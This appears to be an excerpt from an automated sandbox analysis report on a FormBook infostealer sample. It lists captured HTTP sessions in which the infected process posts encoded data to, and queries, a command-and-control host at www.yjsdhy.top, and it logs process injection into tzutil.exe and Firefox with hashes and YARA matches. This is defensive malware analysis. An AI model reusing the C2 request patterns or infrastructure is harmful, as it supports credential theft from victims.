Oct 9, 2024 16:32:04.856858969 CEST	1236	IN	Data Raw: ba e4 8a c4 98 75 d7 44 3a 38 7b b0 10 16 4e 50 d8 e8 b8 03 7c 1a 66 8b 18 8f b2 7f b4 b2 45 90 f3 43 39 26 9f 86 f4 23 4c 36 0c 24 3f 0e 09 08 fc fd e3 10 b4 ba 27 e0 7a cf 83 b8 87 a2 a1 96 52 3a 42 9a 05 bd a6 a7 e1 8c 06 00 10 ba dd dd 59 99 Data Ascii: uD:8{NP\|fEC9&#L6$?'zR:BYiSS( L0pxP`cq8~,RIo@_Jo%i[47OlXUx}zoLaY2?&s_N~i+K'M`n}%9j
Oct 9, 2024 16:32:04.856873989 CEST	1210	IN	Data Raw: 91 30 65 e9 48 d0 35 7a d3 68 ab a9 9c a7 9a aa 2c 43 64 0e b0 fd 80 fd 62 13 49 dd 2e 81 b7 a4 0e 27 05 48 f3 bc 65 77 4e 96 86 8b 4d 6c c9 cd 55 fc 9a 28 e5 bc 4e 32 31 92 43 2c 0c ec 0a 39 28 e1 54 65 eb 5c 66 bf ac 7c dd 6b 97 97 2d d8 e9 02 Data Ascii: 0eH5zh,CdbI.'HewNMlU(N21C,9(Te\f\|k-2:,$G8[RN0lZ-JVG(]pL(bP#5`xPS jO@F08Hd\|1e]s08&lhjh*fVCT.\|RSY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50029	45.197.45.172	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:32:06.512648106 CEST	1793	OUT	POST /tsl3/ HTTP/1.1 Host: www.yjsdhy.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.yjsdhy.top Content-Length: 1243 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.yjsdhy.top/tsl3/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 31 44 64 30 41 5a 3d 53 64 54 35 2b 4c 69 56 58 68 36 6f 30 30 72 55 4a 74 62 4f 58 53 38 4c 51 32 39 4d 44 75 59 70 4d 6a 52 6b 72 37 68 51 52 2f 51 75 75 4c 52 56 58 61 47 77 76 73 62 4e 39 49 4d 47 52 45 4e 6d 67 63 6e 45 74 51 71 2b 58 6c 6c 55 56 34 6f 50 6c 79 66 41 4f 59 6b 4b 30 42 76 65 74 4a 54 77 53 70 4c 2b 53 6d 2f 68 31 4b 62 49 68 4f 44 47 4f 49 77 63 57 33 68 56 66 49 32 62 56 51 45 4e 6b 51 73 72 65 35 55 2f 2b 56 46 71 46 44 49 41 55 52 61 38 65 50 35 37 64 6b 6e 76 74 78 64 79 75 49 51 43 72 67 34 57 67 4d 67 62 6e 56 62 37 34 32 76 46 78 74 73 55 44 77 4c 35 47 52 62 70 54 57 36 56 6f 66 4e 42 32 68 43 4f 53 5a 76 33 47 70 48 32 6c 57 44 68 47 50 56 77 33 61 52 45 53 33 77 41 6f 37 6e 75 59 64 34 5a 4d 54 57 65 6a 51 4f 71 37 4b 6a 7a 63 4d 79 59 36 77 34 5a 70 39 37 36 31 42 2f 30 76 37 4d 51 75 4b 4d 4f 6a 33 4f 68 47 65 72 4b 4b 33 64 50 51 54 44 41 35 4c 50 39 47 2b 38 79 44 6a 41 76 39 47 54 79 34 63 31 32 54 58 4a 53 76 5a 56 71 6b 73 77 5a 43 31 43 6d 41 64 51 71 64 42 6f [TRUNCATED] Data Ascii: 1Dd0AZ=SdT5+LiVXh6o00rUJtbOXS8LQ29MDuYpMjRkr7hQR/QuuLRVXaGwvsbN9IMGRENmgcnEtQq+XllUV4oPlyfAOYkK0BvetJTwSpL+Sm/h1KbIhODGOIwcW3hVfI2bVQENkQsre5U/+VFqFDIAURa8eP57dknvtxdyuIQCrg4WgMgbnVb742vFxtsUDwL5GRbpTW6VofNB2hCOSZv3GpH2lWDhGPVw3aRES3wAo7nuYd4ZMTWejQOq7KjzcMyY6w4Zp9761B/0v7MQuKMOj3OhGerKK3dPQTDA5LP9G+8yDjAv9GTy4c12TXJSvZVqkswZC1CmAdQqdBo444u4ECt6QnmOdy6Ax8S9j+sN3xBn+xnXP7E1A6kL/EdRwPocXnePnuxmwtsuAgO6vIu4O28ZH0A69KW6j+QIYj7CWOKqLxxpxWsjoaejbolChucnTYz7j1eUySuha/a5LA7CmPEKqq1LmtLhsDtbZQVXikI8V2gQgdLQXHzQ/ULQMRFqp+7aNcCeNBVGY3xeBch+WjjXKsgMueZZVgdNXHMt2/I6KkSa+kx7Zpy6mVaDAXgYEUBOCsYhZx7/oy2XKLGMFMa3l2VHe0sKxvLqjfTXFzjXP2mJiB84cQGrF6E+gyrbLGT5/tD7BDG3iy/pMNNqFhUSOWwFwLcuhThUqjbrK6/dSxVpkXiPgkWTiZSaeMfWCmDNDpyHaH7e0GQf+yQ5EKBg7CZZhfuu+xd8FzI4IbvYAtk040My/mFYFUYq04KyUStkJqe7EI3LbaHePlPdq3iCKbAgSCdY98q08MeIKxL+JtIktsVbGnjog+ZQBRUQm7Cc2TGPL2D97PCaX6iJGkeOSSDkMVv9yD3oqXlTRTHdl50wI3HpMsSqgqfjnubKEo9M41n0wbn1m9eNHDHDJV8wfIvqZ1dH3/53HyGkk5k0UQhYOy3ezdzD1aZUYAgJ2kiWzsQtqB/ZWp8brQmRtYQDWAvIG166aeUoepcKNNwRxOPd3 [TRUNCATED]
Oct 9, 2024 16:32:07.390016079 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:32:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66e7a146-8ac0" Content-Encoding: gzip Data Raw: 32 37 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 69 93 14 47 92 e8 e7 c1 6c ff 43 4e 6b 66 1b cc d4 47 56 d6 29 a0 d7 10 42 f3 d6 de be 79 f3 76 67 cd 76 6d 6d 0d cb 23 f2 be 33 eb d4 ca ac 1b 04 34 d0 5c c3 2d 5a 5c 02 81 0e 1a 10 08 9a 6e 10 ff 45 d3 59 55 fd 49 7f e1 79 64 64 55 65 d6 d1 5d d5 dd 68 c6 76 16 21 2a 8f c8 38 3c dc 3d dc 3d 3c dc 77 ed fb f5 47 ff f7 e0 1f ff fd 0f 87 28 d9 37 f4 99 5d fb f0 0f a5 b3 a6 b4 7f ac 26 4f f0 e6 18 7e 86 58 01 7e 0c e4 b3 14 2f b3 ae 87 fc fd 63 45 5f 9c c8 e3 b7 e1 63 d9 f7 ed 09 e4 14 95 d2 fe b1 7f 9b f8 d7 03 13 07 2d c3 66 7d 85 d3 d1 18 c5 5b a6 8f 4c f8 e6 1f 0f ed 47 82 84 da 5f 99 ac 81 f6 8f b9 c8 14 90 8b dc 58 c1 32 e2 34 c5 ef 2a 57 52 50 d9 b6 5c 3f 5e 4e 11 7c 79 bf 80 4a 0a 8f 26 ca f8 e6 7d 4a 31 15 5f 61 f5 09 8f 67 75 b4 9f 9e 9c ee db c9 3f 1c f8 dd a1 89 43 bf ff e3 a1 7f 8e 55 f7 cf a8 84 58 fd 8f 2e 6b 7a bb 3f 2a ba d0 7f cb dc 3f fd 7e f8 00 2a 85 1b 7a 0f ae cd 57 7c 1d cd fc fd 7b 95 3c 9d 3b b4 17 7e 33 4c e6 00 fe cd 1e [TRUNCATED] Data Ascii: 275b}iGlCNkfGV)Byvgvmm#34\-Z\nEYUIyddUe]hv!8<==<wG(7]&O~X~/cE_c-f}[LG_X24WRP\?^N\|yJ&}J1_agu?CUX.kz??~zW\|{<;~3LLNEC&i0u0zgT}SJ-Wb\|X\|Lbs <bp pSq?QH2D\|Tv]LT(d:y&_g\8c2~?nip)&l\|x_h2GdfBhDa>Q\|]67"R6&f9@H)G"?F}8Nc-LB%Y8QGJ=tDt\|:3=l+'YPLXM9"}Wu6pNU) H%e~kEQ"$lz.8k"kN5wM32B}%T)E?aE~D.!I1'&fB35A_Ju!WRJoa6/ gj)=\Xe]UQB2Ru/\+BQh#KC]iew)XGj,ru2>(\|]4U [TRUNCATED]
Oct 9, 2024 16:32:07.390055895 CEST	1236	IN	Data Raw: 0c 2f ef 9b 62 a1 8e 29 5d e9 74 28 d9 a0 65 c3 0a 5a ce 6b e2 b6 1a 44 51 83 87 4c 49 57 bc 7e ad ee 9b 2a 82 d4 10 41 6e 0a 20 1d c1 bc 75 b9 8f 5c 00 e2 60 4c 9a d9 f5 2b 3c c4 4f 64 a4 48 b2 ff 01 c5 a4 ed ca de f0 6b 0e 96 36 e4 4e 70 96 ef Data Ascii: /b)]t(eZkDQLIW~*An u\`L+<OdHk6Np[mW(z{?%RD\|"xGjw\|"(@BnO,R=d~@ .vu1H>X]&3tzgtc^T{8h=i
Oct 9, 2024 16:32:07.390067101 CEST	1236	IN	Data Raw: e0 dc a9 fa e2 4a 70 fd e1 68 2d c9 79 5b 93 2a a6 26 f6 0c a5 e8 59 2c cc 84 58 b3 a0 25 cc db 9e cc 35 ef 6e 8e ff 71 d5 66 cb 5c 47 e0 84 9c 55 d1 65 27 c1 75 24 cd 49 4b be 0d 82 7d 9f 75 82 d0 ad 6a 72 25 ce 92 41 c2 00 ec 01 19 72 fd ea 6a Data Ascii: Jph-y[&Y,X%5nqf\GUe'u$IK}ujr%Arj?kbT@:U56g`6XFW`4\a9%o5r6m`G5CWSdd`Z9KS]WB~Z696tyZuCdZ0zy}e
Oct 9, 2024 16:32:07.390079021 CEST	672	IN	Data Raw: e0 61 c7 71 1b 4c c1 cb 79 b2 e6 6b 5e 76 e4 69 c5 52 5c ba a4 a9 bd 7b 06 3b 65 bd 46 a6 a9 95 11 03 ce ef 5d a4 fa 17 b6 5e d3 06 c7 eb 76 3e ad 26 64 84 74 81 f5 54 55 48 f7 f5 49 18 c9 7a 5d e6 8c 54 d9 41 e0 64 b4 65 6a d5 0d 1e 71 2a 57 00 Data Ascii: aqLyk^viR\{;eF]^v>&dtTUHIz]TAdejqWZwzbR@DZf y`6)Nc!MJ.kRe5+RyCz2":y:eJ85y&E*_a,pNB)B#rbK3W?/
Oct 9, 2024 16:32:07.390100002 CEST	1236	IN	Data Raw: e0 8b cf eb 0b 73 f8 76 69 21 b8 f2 59 e3 fa 6a f0 e6 32 f5 d3 ec 45 2a f2 9a bc f1 66 fd fa 31 78 df 7c 7b be 79 67 01 2e 3a 1b af 22 28 c7 4c d6 71 68 8a 75 fd 9a 65 19 d0 41 38 ac 13 ed b3 72 2c af 49 ae 55 04 e6 ab 18 ac 84 3e 28 ba fa ee a9 Data Ascii: svi!Yj2Ef1x\|{yg.:"(LqhueA8r,IU>(>7'Tj:.)z\dR!/%uI &C[SRz@a9f50]r$A3ILV5Oo<[}H-4NZ\|=Xo.}zSAr
Oct 9, 2024 16:32:07.390110970 CEST	1236	IN	Data Raw: b6 36 aa 99 e1 46 df ab f3 f5 e0 b5 c3 16 4b 96 25 55 e0 5c d0 c8 c2 53 e3 fc d1 e0 c2 b5 e6 dd 6f eb df dd 6e 5e f9 a6 b9 7c 37 98 3b 01 0f 9b 4f e6 d6 5e 9d 6e be 3d d1 12 a1 6e e1 f9 b8 f1 a6 f9 e2 59 70 e6 dc fa dc a3 c6 d5 1b f5 93 af 7e 7e Data Ascii: 6FK%U\Son^\|7;O^n=nYp~~y7V/>v6>\|O/n7m`+Jgsbku!!5+?n\zAYE3;ha6F61a0U2unsIs{
Oct 9, 2024 16:32:07.390120029 CEST	1236	IN	Data Raw: ac 05 81 60 c3 5b 6f 92 b7 8c 29 9a 61 68 a6 90 99 2e 30 0c 33 32 91 fd e2 80 88 02 56 ed 2c 78 87 20 38 21 27 55 33 42 d5 4b f5 10 5c bf 1d 88 d6 33 b2 13 91 c3 66 a4 02 ac 47 6d a5 24 78 72 ae f1 f4 19 a8 08 e0 b2 b1 3e fb 79 fd 14 b6 30 a5 82 Data Ascii: `[o)ah.032V,x 8!'U3BK\3fGm$xr>y0g@^nn>y<J~]~Sk+0z,1=Y%18w1Jv9k*Pw=GC[STE`Dg5w#\mij\`ro)!y_:R2c\\
Oct 9, 2024 16:32:07.390130997 CEST	104	IN	Data Raw: f2 8d 1b 4b f5 db 27 c2 4d 8b 95 60 e9 6e 7d fe 25 39 6a 05 a7 80 60 c9 c3 15 26 7b db 7c f0 65 70 fc 19 48 23 f5 3b f3 d0 01 e8 1e 48 64 d8 0c 17 1a 52 c9 82 06 f5 ff bd c9 79 f6 5e 6a f3 9f 7f ff d7 03 bf ff f8 c0 ef b1 21 fa db d3 e0 5b 05 d2 Data Ascii: K'M`n}%9j`&{\|epH#;HdRy^j![=$XUga
Oct 9, 2024 16:32:07.390141964 CEST	1236	IN	Data Raw: e1 fa d7 df ad df 3c 13 3c 7d 8a 01 17 82 86 bc 25 03 58 5b 0e f7 6d c2 58 ce b0 39 83 c1 17 c6 a6 86 5d fc 78 98 e7 d0 48 75 07 9c f9 a3 a0 cc 61 79 72 0b c1 93 e3 e7 cc f0 d6 cd 89 47 c1 ec 2d 02 f4 c6 ed 4b d8 e3 e5 dc 29 98 a7 f5 d9 5b a4 69 Data Ascii: <<}%X[mX9]xHuayrG-K)[i$&l{;)#Q:(TI&OWva8 ZqAC'DoYx/v1rx^[l1^df;<dt&uw_'u/eArn?
Oct 9, 2024 16:32:07.390152931 CEST	882	IN	Data Raw: 3a 08 9c 2d 4a f7 99 cc 49 8c dd 88 38 a4 40 1e 67 43 51 7c d8 15 2b 41 4e 6a 48 48 d2 35 3b 24 33 b5 69 41 fc 1d dd 82 dc 6d cd d3 e7 fe f1 e0 1f 82 7b 27 60 27 92 01 93 55 ba 50 08 ce bd 9c a0 89 e5 b3 15 d9 34 b2 54 8b 8a 8e a6 22 25 7c b2 12 Data Ascii: :-JI8@gCQ\|+ANjHH5;$3iAm{'`'UP4T"%\|?}n>b{?P=In0/Vebypi^87uoyt\c!-g_PG2E8EDm`5N'vbmTH6+ib*Bxw70jDfv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50030	45.197.45.172	80	2276	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 9, 2024 16:32:09.056571007 CEST	500	OUT	GET /tsl3/?1Dd0AZ=ff7Z98uvbm638VP3JcjmESh/VmNJU8ErJ1Yzz5lHVPQt2vZNZaCIxPyWwoBoOzoyhP3GiADwE1pXH5VsixDoB7IhtDmu8bTsHonITBjxr4DKmZq9BNE+ElxmWonvBi1Ayw==&-n1P=0hFdS6 HTTP/1.1 Host: www.yjsdhy.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 9, 2024 16:32:09.957093954 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 09 Oct 2024 14:32:09 GMT Content-Type: text/html Content-Length: 35520 Connection: close Vary: Accept-Encoding ETag: "66e7a146-8ac0" Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 63 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 41 47 45 2d 45 4e 54 45 52 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 76 65 61 6c 54 72 61 6e 73 28 44 75 72 61 74 69 6f 6e 3d 30 2c 54 72 61 6e 73 69 74 69 6f 6e 3d 31 29 22 3e 0a 3c 74 69 74 6c 65 3e 26 23 78 38 31 37 45 3b 26 23 78 35 33 35 41 3b 26 23 78 36 43 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="zh-cn"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="renderer" content="webkit"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="PAGE-ENTER" content="RevealTrans(Duration=0,Transition=1)"><title>腾博汇-线上娱乐第一品牌</title><meta name="keywords" content="腾博官网入口网址,腾博汇游戏官方入口,腾博官方诚信唯一网站app"><meta name="description" content="腾博官网入口网址50%首寸红莉,腾博官网入口网址网址,平台,官网入口,,腾博汇游戏官方入口&#x5 [TRUNCATED]
Oct 9, 2024 16:32:09.957165956 CEST	1236	IN	Data Raw: 31 46 3b 26 23 78 35 33 44 31 3b 26 23 78 35 43 35 35 3b 26 23 78 36 32 31 38 3b 26 23 78 37 35 36 35 3b 26 23 78 38 42 41 31 3b 26 23 78 35 32 31 32 3b 26 23 78 35 45 37 36 3b 26 23 78 39 31 43 37 3b 26 23 78 35 33 44 36 3b 26 23 78 34 45 38 36 Data Ascii: 1F;发展战略计划并采取了积极有效的措施,腾博官方诚信唯一网站app致力&#x4
Oct 9, 2024 16:32:09.957201004 CEST	1236	IN	Data Raw: 65 2d 62 6c 6f 63 6b 3b 7d 09 0a 20 2e 74 6f 70 20 2e 73 68 61 72 65 20 75 6c 20 6c 69 20 61 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 35 70 78 3b 0a 09 Data Ascii: e-block;} .top .share ul li a { text-align: center; line-height: 35px; display: block; margin-left: 10px; transition: all .5s; color: #999;} .top .share ul li a img { margin-right: 3px;margin-bottom: 12px;}</sty
Oct 9, 2024 16:32:09.957233906 CEST	492	IN	Data Raw: e6 8d a2 e5 af bc e8 88 aa 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 65 6d 6b 70 64 6f 78 70 63 32 20 62 75 74 74 6f 6e 20 20 69 63 6f 6e 2d 6e 61 76 69 63 6f 6e 22 20 64 61 74 61 2d 74 61 72 67 65 74 Data Ascii: </span> <button class="emkpdoxpc2 button icon-navicon" data-target="#nav-main1"> </button> </div> </div> <div class="epx2t2caha layout fixed header-nav bg-main bg-inverse"> <div class="eszvwk6spe container"> <
Oct 9, 2024 16:32:09.957268000 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6b 33 65 65 61 78 6f 7a 77 22 3e 3c 61 20 63 6c 61 73 73 3d 22 65 78 72 6c 35 66 64 6e 67 64 20 66 69 72 73 74 2d 6c 65 76 65 6c 22 20 68 72 65 66 3d 27 2f 68 74 6d 6c 2f 64 Data Ascii: <li class="ek3eeaxozw"><a class="exrl5fdngd first-level" href='/html/dullhuyqff/'>app<span class="eaqlicakne downward"></span></a> <ul class="ergdt1er4d drop-menu">
Oct 9, 2024 16:32:09.957299948 CEST	1236	IN	Data Raw: 67 74 64 6c 66 62 67 78 2f 22 3e e7 bc 93 e5 86 b2 e7 ba b8 e5 9e ab e5 8f 8a e6 9c ba e5 99 a8 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 65 68 38 70 6b Data Ascii: gtdlfbgx/"></a></li> <li class="eh8pkgxnkf"><a href="/html/usoaczefzo/"></a></li> </ul> </li> <li class="edbd7oxlhq"><a c
Oct 9, 2024 16:32:09.957334042 CEST	1236	IN	Data Raw: 73 2f 27 3e e5 9c a8 e7 ba bf e7 95 99 e8 a8 80 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 39 66 71 70 76 72 6b 65 69 20 64 6f 77 6e 77 61 72 64 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 Data Ascii: s/'><span class="e9fqpvrkei downward"></span></a> <ul class="eixqmuswqp drop-menu"> </ul> </li> <li class="eqlaccp19a"><a class="edl6ca7bep
Oct 9, 2024 16:32:09.957365990 CEST	1236	IN	Data Raw: 65 33 6f 7a 6d 77 74 36 6a 67 20 73 69 74 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 79 6a 73 64 68 79 2e 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 73 74 61 74 69 63 2f 70 69 63 74 75 72 65 2f 76 6e 2e 6a 70 67 22 3e 63 68 3c Data Ascii: e3ozmwt6jg site"> <a href="http://yjsdhy.top"><img src="static/picture/vn.jpg">ch</a> </li> <li class="eqjnrc5bj4 site"> <a href="http://yjsdhy.top"><img src="static/picture/en.jpg">English</a> </li> </ul> </div> </
Oct 9, 2024 16:32:09.957401991 CEST	1236	IN	Data Raw: 35 65 78 20 63 6f 6e 74 61 63 74 2d 65 6d 61 69 6c 20 66 6c 6f 61 74 2d 72 69 67 68 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 66 62 6a 6a 76 67 71 65 67 20 69 63 6f 6e 2d 65 6e 76 65 6c 6f 70 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 Data Ascii: 5ex contact-email float-right"><span class="efbjjvgqeg icon-envelope"></span></div> <div class="eu4eq2pgal contact-tel float-right"><span class="e7dteqyo1h icon-phone"></span></div> </div> </div> </div> </div> <
Oct 9, 2024 16:32:09.957437992 CEST	1236	IN	Data Raw: 74 2d 6c 65 76 65 6c 22 20 68 72 65 66 3d 27 2f 68 74 6d 6c 2f 62 64 6f 74 6c 79 6a 74 6a 74 2f 27 3e e5 85 b3 e4 ba 8e e6 88 91 e4 bb ac 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 62 74 76 38 6d 65 73 65 64 20 64 6f 77 6e 77 61 72 64 22 3e 3c 2f Data Ascii: t-level" href='/html/bdotlyjtjt/'><span class="ebtv8mesed downward"></span></a> <ul class="exgesa7lba drop-menu"> <li class="eepogpfenz"><a href="/html/bprhpiozjs/"></a></l
Oct 9, 2024 16:32:09.962408066 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 65 6a 75 33 69 67 68 39 65 71 20 64 72 6f 70 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 Data Ascii: <ul class="eju3igh9eq drop-menu"> <li class="ep3hhaqmdd"><a href="/html/pejbwgveum/"></a></li> <li class="eeahwjypf9"><a href="/html/ikwseycmpz/"></a>

Target ID:	0
Start time:	10:28:07
Start date:	09/10/2024
Path:	C:\Users\user\Desktop\3qsTcL9MOT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3qsTcL9MOT.exe"
Imagebase:	0xd50000
File size:	716'288 bytes
MD5 hash:	768FE6AD2D197736577304BF3796F440
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:28:08
Start date:	09/10/2024
Path:	C:\Users\user\Desktop\3qsTcL9MOT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3qsTcL9MOT.exe"
Imagebase:	0x4e0000
File size:	716'288 bytes
MD5 hash:	768FE6AD2D197736577304BF3796F440
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:28:24
Start date:	09/10/2024
Path:	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe"
Imagebase:	0x800000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	10:28:25
Start date:	09/10/2024
Path:	C:\Windows\SysWOW64\tzutil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\tzutil.exe"
Imagebase:	0xd60000
File size:	48'640 bytes
MD5 hash:	31DE852CCF7CED517CC79596C76126B4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:28:38
Start date:	09/10/2024
Path:	C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe"
Imagebase:	0x800000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:28:51
Start date:	09/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
